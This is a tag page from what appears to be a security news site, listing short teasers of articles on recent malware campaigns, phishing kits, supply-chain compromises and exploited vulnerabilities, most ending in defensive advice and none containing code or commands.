Tag: malware
697 articles
script kiddie Risky Trend: Must-Have Parental Guide
Think a school outage means a shadowy hacker? More often it’s curious teens — the ICO says students cause over half of school cyberattacks — so parents can steer curiosity into clubs, supervised learning, and clear conversations about ethics before experimentation becomes real harm.
execute arbitrary code: Stunning Risky Cursor Flaw
Imagine opening a repo and it runs code without asking — Cursor, an AI-powered editor, can be tricked into silently executing arbitrary scripts from a crafted repository, putting your machine and credentials at risk. Until safer defaults arrive, treat untrusted repos like unknown executables: sandbox them, audit files first, and enable strict prompts for project-initiated execution.
bulletproof hosting Exposed: Risky Evasion Still Thrives
When the EU sanctioned Stark Industries, the bulletproof hosting firm just rebranded and moved assets to sister companies — a stark reminder that Kremlin-linked operators can easily dodge enforcement and keep malicious infrastructure online. To make sanctions stick, policymakers and tech firms must pair legal designations with faster takedowns, transparency rules, and tighter cooperation across registrars, payment processors and ISPs.
ConnectWise ScreenConnect Risky Exploit: Stunning AsyncRAT
Imagine your trusted remote-admin tool becoming the very doorway attackers use to steal credentials and siphon crypto—researchers found ConnectWise ScreenConnect sessions abused to run a fleshless, in-memory VBScript loader that dropped AsyncRAT to harvest keys, keystrokes, and wallets. Harden RMM access, monitor session scripts, and assume compromise—because when legitimate tooling is weaponized, detection needs to get smarter fast.
China Launched Egg Attacks: Alarming Risky Campaign
Researchers uncovered EggStreme, a stealthy in‑memory malware framework tied to intrusions against a Philippine military contractor that mirror Chinese APT tactics. Its fileless, modular design — ideal for long‑term spying or sabotage — is a wake‑up call to tighten contractor cyber hygiene, MFA, and public‑private defenses.
modular macOS backdoor: Stunning Dangerous Threat Revealed
What if your Mac had been quietly harboring a stealthy backdoor for years? Researchers say ChillyHell—a modular macOS implant—evaded Apple’s protections for up to four years, showing how dormancy and clever design let attackers hide in plain sight.
Salty2FA: Exclusive Dangerous Phishing Threat
A new phishing kit called Salty2FA is turning multi-factor authentication into an exploitable step, automating interception of codes, cookies, and push prompts to bypass SMS and app-based 2FA. Organizations should treat 2FA as an architecture—move to phishing-resistant methods like FIDO2, tighten session controls, and ramp up detection before attackers rent this tool and hit your users.
remote access trojan: Stunning Risky Threat Revealed
One click from a phishing email can now install MostereRAT — a stealthy, modular remote‑access trojan that evolved from banking malware into a plugin‑driven tool for data theft, persistence and lateral movement — proving attackers are turning familiar scams into long‑term, hard‑to‑detect footholds. Protect yourself with multifactor authentication, least‑privilege access, up‑to‑date patching and behavioral detection, because signature‑based defenses alone won’t cut it.
crypto phishing Shocking Supply-Chain Nightmare
One phishing click that reset a maintainer’s 2FA let attackers slip backdoors into at least 18 popular npm packages — including debug and chalk — turning trusted libraries into supply-chain landmines. It’s a wake-up call: human error can ripple through the entire ecosystem, so stronger authentication, multi-person publishing, and tighter dependency hygiene can’t wait.
Salt Typhoon: Exclusive, Dangerous Domain Network
Imagine attackers quietly living in your network for years — Salt Typhoon used dozens of rotating, innocent-looking domains since 2020 to stay hidden, steal intelligence, and frustrate takedowns. Defenders now need continuous monitoring, smarter DNS controls, and cross-sector cooperation to spot and evict these patient spies.
GPUGate malware: Exclusive Risky Search-Ad Campaign
Think twice before clicking that top search result—new GPUGate malvertising buys Google Ads and even fakes GitHub commit hashes to push trojanized installers that look legit. Protect yourself by sticking to official project pages, verifying signatures, and avoiding downloads from ad links.
remote-access trojan Stealthy Risk: Exclusive Alert
Meet MostereRAT: a stealthy remote-access trojan that slips into Windows systems via convincing phishing and then hides using living‑off‑the‑land tactics, process injection and obfuscated code to evade detection. The takeaway: basic hygiene—skepticism about attachments, disabled macros, timely patches and layered visibility—now matters more than ever.
TP-Link routers: Must-Fix Risky Vulnerabilities
CISA warns that attackers are actively exploiting multiple vulnerabilities in widely used TP‑Link routers, putting homes and small businesses at risk of persistent compromise. Check for firmware updates, disable remote management, change default passwords, and replace aging devices if you can to close the door on intruders.
CastleRAT malware: Exclusive Dangerous C/Python Threat
A new strain of CastleRAT, now rewritten in both C and Python, is being spread via a nasty ClickFix trick that convinces users to paste malicious commands into their terminals—don’t paste commands you don’t trust. Stay skeptical of unsolicited “fixes,” verify sources, and treat pasteable commands like executable attachments.
macOS stealer Exclusive: Dangerous, Must-Stop Threat
Think a cracked app is a harmless shortcut? Trend Micro warns that a macOS stealer called AMOS is being bundled with pirated apps and delivered via terminal commands that grant attackers sweeping access—don’t run unverified installers or command-line scripts, and stick to legitimate software to protect your accounts and networks.
Sitecore sample keys: Risky, Must-Have Fixes
A copy‑paste of Sitecore’s documented sample machineKey values has been weaponized to gain remote code execution and install snooping malware, proving that example keys in production are dangerous secrets. Check your Sitecore instances now, rotate any sample keys, and lock down exposed endpoints before scanners turn convenience into a full breach.
search engine poisoning: Stunning Dangerous Threat
Imagine trusted search results quietly steering you to shady gambling sites — ESET’s researchers uncovered GhostRedirector, a China-aligned crew that hijacks internet-facing Windows servers with Potato-family exploits and stealth malware to poison search rankings for profit. This subtle, long-running tactic shows why monitoring server integrity, patching privilege-escalation flaws, and watching for sudden ranking anomalies are now essential defenses against invisible manipulation.
Microsoft Outlook backdoor: Exclusive Dangerous Threat
A new Outlook backdoor called NotDoor quietly watches for trigger words inside incoming mail, letting APT28 gain stealthy, long-term access to companies across NATO countries. Defenders should harden endpoints, disable unnecessary VBA, and share threat intelligence to detect and disrupt these low-noise, high-impact intrusions.
GhostRedirector: Exclusive Dangerous China-Aligned Threat
A newly discovered group called GhostRedirector quietly breached 65 Windows servers using custom tools and stealthy redirection techniques, and its infrastructure and tradecraft point to China-aligned objectives. Treat this as a wake-up call to move beyond signature-based detection, hunt for anomalous behavior, and harden your systems now.
threat-intel sharing: Must-Have Critical Lifeline
As the reauthorization deadline nears, Congress must decide whether to renew cyber‑intel sharing authorities and funding that let companies and federal defenders act fast — a lapse could hamstring responses, while sensible reforms could bolster privacy at the cost of speed.
VBA-based backdoor: Stunning Risky Outlook Threat
Think your inbox is safe? Researchers warn APT28 has deployed a VBA-based Outlook backdoor called NotDoor that hides in macros to harvest emails and stay persistent, so it’s time to tighten macro policies, add telemetry, and treat your mail client as part of the attack surface.
IPTV piracy: Stunning 1,100-Domain Risk Exposed
A massive IPTV piracy ring spanning about 1,100 domains was exposed — offering dirt‑cheap access to Apple TV, Disney+, HBO and Netflix while often exposing viewers to malware, fraud and billions in lost revenue. The takedown shows how convenience and low cost fuel organized piracy that threatens creators, consumers and the whole streaming ecosystem.
Lazarus Group Exclusive: Dangerous DeFi RATs Revealed
A North Korea-linked Lazarus campaign used a crafty phishing lure to deploy three cross-platform RATs—PondRAT, ThemeForestRAT and RemotePE—breaching a DeFi organization and highlighting how attackers now tailor stealthy, multi‑OS toolsets to target decentralized finance. It’s a wake-up call: assume breach, tighten access and key protections, and shift to behavior-based detection across heterogeneous environments.
signed Windows kernel driver: Stunning Risky Backdoor
When a Microsoft‑signed WatchDog driver (amsdk.sys) was abused to neuter endpoint defenses and plant ValleyRAT, it proved that a valid signature isn’t a guarantee of safety. This Silver Fox campaign underscores why organizations must stop trusting signatures alone and add behavior‑based controls and tighter vetting for privileged drivers.